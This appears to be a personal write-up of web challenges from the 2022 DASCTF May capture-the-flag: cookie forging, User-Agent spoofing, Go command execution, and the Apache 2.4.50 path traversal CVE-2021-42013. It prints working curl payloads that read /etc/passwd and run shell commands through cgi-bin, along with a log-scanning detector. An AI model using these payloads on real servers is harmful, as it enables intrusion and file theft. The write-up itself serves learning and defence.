
2022DASCTF MAY

2022-07-23 20:16:00 Occasionally dodge dark clouds 334

The big guys are all trying hard, so I can't fall behind. Come on!!!


Power Cookie

Open the page; it offers a guest login, so click it.

Nothing happens. Challenges like this are usually solved by capturing the request and modifying it: the cookie value, X-Forwarded-For, and so on.

The hint mentions admin, so it is the cookie.

I tried it and found that setting the cookie admin=1 is enough.

Magic browser

No idea at first, so take a look at the page source.

It contains a hex-encoded string. Decode it:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75


Then change the request's User-Agent to this value.

You can then get the flag.

getme

Open the page: it contains only <!-- pwd:/usr/local/apache2/ -->, just this directory information.

In a word: baffled!

Then scan it with Burp, which finds the server version.

Search for Apache/2.4.50 (Unix):

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.50 (CVE-2021-42013)

Exploit PoC:

curl -v --path-as-is '<target-address>:<port>/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

This lets you read arbitrary files.

That shows the vulnerability is present.

When the target server has cgi or cgid enabled, commands can also be executed:

    curl -v --data "echo; <command>" '<target-address>:<port>/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

or, as a raw request:

GET:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:

echo Content-Type: text/plain; echo;ls /

I don't know why, but I got no response. Other people's writeups do exactly this, get the directory listing, and then explore from there. It could be that something went wrong with my Burp; I debugged it.
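An added example, not part of the original writeup: a small Python detector for the double-encoded `.%%32%65` traversal used above, run over constructed access-log lines. The function names, log lines and IP addresses are assumptions made for illustration, and it generalizes slightly by counting how many decoding passes expose a `..` segment.

```python
import re

# One decoding pass: only well-formed %XX triplets change, so "%%32%65" -> "%2e".
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")
# Method, raw request target and status from an Apache common/combined log line.
_REQ = re.compile(r'"([A-Z]+) (\S+) [^"]*" (\d{3})')

def decode_once(s):
    return _PCT.sub(lambda m: chr(int(m.group(1), 16)), s)

def rounds_to_traversal(path, max_rounds=4):
    """Number of decoding passes after which a '..' segment appears, else None."""
    for rounds in range(max_rounds + 1):
        if ".." in path.split("/"):
            return rounds
        decoded = decode_once(path)
        if decoded == path:  # fully decoded and no traversal found
            return None
        path = decoded
    return None

def classify(line):
    """Return a finding dict for a traversal attempt, or None for a clean line."""
    m = _REQ.search(line)
    if not m:
        return None
    method, target, status = m.groups()
    path = target.split("?", 1)[0]
    rounds = rounds_to_traversal(path)
    if rounds is None:
        return None
    return {"method": method, "rounds": rounds,
            "double_encoded": rounds >= 2,  # the CVE-2021-42013 form
            "cgi_target": path.startswith("/cgi-bin/"),
            "served": status == "200"}  # answered rather than rejected

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2022:20:01:11 +0000] "GET /icons/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [23/Jul/2022:20:02:40 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 57',
    '198.51.100.7 - - [23/Jul/2022:20:03:02 +0000] "GET /icons/.%2e/.%2e/etc/passwd HTTP/1.1" 403 226',
    '198.51.100.9 - - [23/Jul/2022:20:03:30 +0000] "GET /icons/a%20b.png HTTP/1.1" 200 4463',
]

def scan(lines):
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

CVE-2021-42013 is fixed in Apache HTTP Server 2.4.51; a `double_encoded` hit with `served` true on a 2.4.50 host is the case to investigate first.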

 

hackme

Open the page and notice that the links at the bottom are clickable. Click through.

It turns out that each link may correspond to a file, and a command is executed in each corresponding file, such as whoami and pwd above.

Seeing this, and not having learned Go yet, I got a brief understanding from "Five ways to execute commands with os/exec in Go" (Zhihu). You need to upload a users file, which the server then parses as Go.

package main

import (
    "fmt"
    "os/exec"
)

func main() {
    Command("ls /") // the command to execute
}

// Command runs cmd through bash and prints its combined stdout and stderr.
func Command(cmd string) error {
    c := exec.Command("bash", "-c", cmd)
    output, err := c.CombinedOutput()
    fmt.Println(string(output))
    return err
}

 

Finally I found the flag: replace ls / in the code above with cat /flag and you get it. So this challenge doesn't seem to be entirely about Go; even if you don't understand the Go language, what it tests is a Go script.

As for the next two challenges, my ability really isn't enough yet, so I'll keep learning.

 
